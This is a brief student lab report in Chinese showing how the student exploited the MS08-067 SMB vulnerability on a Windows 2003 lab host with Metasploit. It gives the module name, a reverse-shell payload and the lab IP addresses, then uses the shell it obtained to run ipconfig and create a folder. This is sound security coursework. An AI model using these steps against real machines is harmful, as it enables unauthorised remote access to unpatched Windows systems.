20145333茹翔 Exp5 MS08_067漏洞测试
实验过程
-
IP:
kali:192.168.31.177、windows 2003 :192.168.31.223 -
使用命令
msfconsole进入控制台,可以使用search ms08_067查看相关信息。

-
得到相应模块名之后,我们使用该模块,使用
show payloads,确定攻击载荷。

-
使用命令
use exploit/windows/smb/ms08_067_netapi -
set payload generic/shell_reverse_tcp选择playoad,并查看相关信息。

-
使用命令
show options确定,之后按照显示出的信息进行修改,我们需要设置好监听ip,监听端口以及攻击Ip

-
我们可以通过修改target的值,来选择我们具体想要攻击的计算机系统(通常可以采用自动选取,即target设置为0)

-
使用命令
exploit发起攻击,实验结果如下图

-
使用
ipconfig命令查看

-
新建文件夹
20145333

